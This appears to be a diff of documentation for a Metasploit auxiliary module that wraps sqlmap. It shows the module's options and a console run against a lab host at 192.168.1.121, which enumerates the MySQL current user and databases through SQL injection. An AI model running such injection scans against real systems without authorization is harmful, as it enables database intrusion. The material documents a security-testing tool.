@@ -32,43 +32,42 @@ msf auxiliary(wmap_sqlmap) > show options
32
32
33
33
Module options:
34
34
35
- Name Current Setting Required Description
36
- ---- --------------- -------- -----------
37
- BATCH true yes Never ask for user input, use the default behaviour
38
- DATA no The data string to be sent through POST
39
- METHOD GET yes HTTP Method
40
- OPTS --dbs --current-user no The sqlmap options to use
41
- PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
42
- Proxies no Use a proxy chain
43
- QUERY id=1 no HTTP GET query
44
- RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
45
- RPORT 80 yes The target port
46
- SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
47
- SSL false no Use SSL
48
- THREADS 1 yes The number of concurrent threads
49
- VHOST no HTTP server virtual host
35
+ Name Current Setting Required Description
36
+ ---- --------------- -------- -----------
37
+ BATCH true yes Never ask for user input, use the default behaviour
38
+ BODY no The data string to be sent through POST
39
+ METHOD GET yes HTTP Method
40
+ OPTS --dbs --current-user no The sqlmap options to use
41
+ PATH /sqlmap/mysql/get_int.php yes The path/file to test for SQL injection
42
+ Proxies no Use a proxy chain
43
+ QUERY id=1 no HTTP GET query
44
+ RHOSTS 192.168.1.121 yes The target address range or CIDR identifier
45
+ RPORT 80 yes The target port
46
+ SQLMAP_PATH /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py yes The sqlmap >= 0.6.1 full path
47
+ SSL false no Use SSL
48
+ THREADS 1 yes The number of concurrent threads
49
+ VHOST no HTTP server virtual host
50
50
51
51
msf auxiliary(wmap_sqlmap) > run
52
- [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121/sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
52
+ [*] exec: /home/inquis/software/sqlmap/trunk/sqlmap/sqlmap.py -u 'http://192.168.1.121:80/ /sqlmap/mysql/get_int.php?id=1' --method GET --dbs --current-user --batch
53
53
SQLMAP:
54
54
SQLMAP: sqlmap/0.6.1 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com>
55
55
SQLMAP: and Daniele Bellucci <daniele.bellucci@gmail.com>
56
56
SQLMAP:
57
- SQLMAP: [*] starting at: 01:31:41
57
+ SQLMAP: [*] starting at: 16:23:19
58
58
SQLMAP:
59
- SQLMAP: [01:31:42 ] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
59
+ SQLMAP: [16:23:20 ] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
60
60
SQLMAP: back-end DBMS: MySQL >= 5.0.0
61
61
SQLMAP:
62
62
SQLMAP: current user: 'testuser@localhost'
63
63
SQLMAP:
64
- SQLMAP: available databases [4 ]:
64
+ SQLMAP: available databases [3 ]:
65
65
SQLMAP: [*] information_schema
66
66
SQLMAP: [*] mysql
67
- SQLMAP: [*] privatedb
68
67
SQLMAP: [*] test
69
68
SQLMAP:
70
69
SQLMAP:
71
- SQLMAP: [*] shutting down at: 01:31:44
70
+ SQLMAP: [*] shutting down at: 16:23:21
72
71
SQLMAP:
73
72
[*] Auxiliary module execution completed
74
73
msf auxiliary(wmap_sqlmap) >
0 commit comments